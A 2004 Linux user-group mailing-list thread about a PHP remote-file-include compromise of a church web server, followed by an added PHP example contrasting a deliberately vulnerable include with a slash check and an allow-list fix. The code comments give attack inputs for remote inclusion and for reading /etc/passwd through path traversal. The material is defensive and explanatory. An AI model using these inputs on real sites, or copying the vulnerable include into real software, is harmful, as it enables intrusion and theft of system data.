Hmmm.  After digging on Doug's system, I found a little more.

Apparently the PHP include statement can include files ON ANOTHER SYSTEM. 
Yep, the hacker put a script on tripod.com, then submitted a request to
include it.  The first time he/she attempted to download and compile a DOS
client.  No compiler installed.  Then they tried running a Perl script.
Then apparently they just downloaded binaries to /tmp and ran them.  The
nerve of the guy...

The good news is since PHP only runs as user Apache, there were limited
places that they could write or run programs.  No rootkits.

He did leave a program called tty and bindtty (his clients), which I
trashed, as well as all the other files he created (I scanned the entire
system).  I also ran a clean copy of ps and netstat to make sure there
wasn't something else running.

We all learn something every day...  Especially with Linux.

Pastor Doug Coats said:
> The answer is.....
>
> Me!
>
> I programmed our web page with a vital error.  I passed a variable that
> contained the name of a file to be opened in such a way that it could be
> changed.  So the hacker simply changed it to whatever file they wanted
> to see and presto - I handed them my box.
>
> Good news - We find no evidence that they have capitalized on this
> information yet.
>
> Bad news - I have to change everyone's passwords immediately.
>
> I fixed (with the help of a friend) the website by checking the variable
> for a "/".  If it contains that, it simply kills the script.  So now they
> are locked into that directory.
>
> I will probably change it more so that the variable doesn't match the
> exact file it is opening but I think the passwords come first.
>
> Thank you to everyone who helped out.  I finally tracked what the
> cracker was attempting to do in the httpd error logs and then duplicated
> their efforts to my horror.
>
> Live and learn.
>
> Doug
>
> -----Original Message-----
> From: tclug-list-bounces at mn-linux.org
> [mailto:tclug-list-bounces at mn-linux.org]On Behalf Of Pastor Doug Coats
> Sent: Thursday, March 04, 2004 8:55 AM
> To: TCLUG Mailing List
> Subject: [TCLUG] Attack
>
>
> I am running Fedora Core 1 and had an interesting attack show up in my
> logs.
>
> Someone tried to ssh in, running through the entire list of users.
>
> My question is how did they get that list of valid users?  There is no
> evidence of simply trying random users - they knew every user.
>
> Is there something in Linux that would return a request for every user
> name?
>
> Is there something I should have turned off so that cannot happen again?
>
> I blocked their IP address in iptables but they can find a way around
> that.  And I would like to block anyone from trying something similar.
>
> Any suggestions would be greatly appreciated.
>
> Thanks All,
>
> Doug
>
>
> _______________________________________________
> TCLUG Mailing List - Minneapolis/St. Paul, Minnesota
> http://www.mn-linux.org tclug-list at mn-linux.org
> https://mailman.real-time.com/mailman/listinfo/tclug-list
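Editor's added example, not code from Doug's site or from anyone on the thread: the page-selector include the two messages describe, written three ways.  The first is the pattern Doug says he had (the request names the file), which gives both the remote include the reply found and the local path traversal Doug found; the second is Doug's "/" check; the third is the allow-list he mentions as the next step.  The ./pages/ directory, the "page" parameter and the page names are assumptions made up for the example, and the code is modern PHP, not the PHP 4 of a Fedora Core 1 box.

```php
<?php
// Added example, not from the thread. Assumptions (hypothetical): included
// files live in ./pages/ next to this script, and the selector arrives as the
// GET parameter "page".

// 1. The pattern described in the thread: the request decides what is included.
//    With allow_url_fopen on (and, from PHP 5.2, allow_url_include too), a
//    request such as ?page=http://host.example/x.txt fetches and executes
//    remote code; with any setting, ?page=../../../../etc/passwd reads local
//    files, which is how a full user list walks out the door.
function include_page_vulnerable(string $page): void
{
    include $page;                       // attacker-controlled path, no checks
}

// 2. Doug's hot fix: refuse anything containing "/". This does stop "../"
//    traversal and every "scheme://" URL (they all need a slash), but the
//    caller can still name any file in the script's own directory.
function include_page_slash_check(string $page): void
{
    if (strpos($page, '/') !== false) {
        die('invalid page');
    }
    include $page;
}

// 3. Allow-list: the request picks a key, the code picks the file. The
//    parameter never becomes a path, so traversal, stream wrappers and
//    remote URLs are simply unreachable.
const PAGES = [
    'home'    => 'home.php',
    'sermons' => 'sermons.php',
    'contact' => 'contact.php',
];

function resolve_page(string $page): ?string
{
    if (!array_key_exists($page, PAGES)) {
        return null;                     // unknown key: nothing is included
    }
    $base = realpath(__DIR__ . '/pages');
    $path = realpath(__DIR__ . '/pages/' . PAGES[$page]);
    // Belt and braces: confirm the resolved file still sits under ./pages/,
    // so a bad entry in the table cannot point outside it either.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$file = resolve_page($_GET['page'] ?? 'home');
if ($file === null) {
    http_response_code(404);
    exit('no such page');
}
include $file;
```

Whichever variant is in place, the thing to confirm after the fact is the same one the reply did: the Apache error log shows the include attempts (failed opens of the requested names), and that is where both the remote URL and the "../" strings turn up.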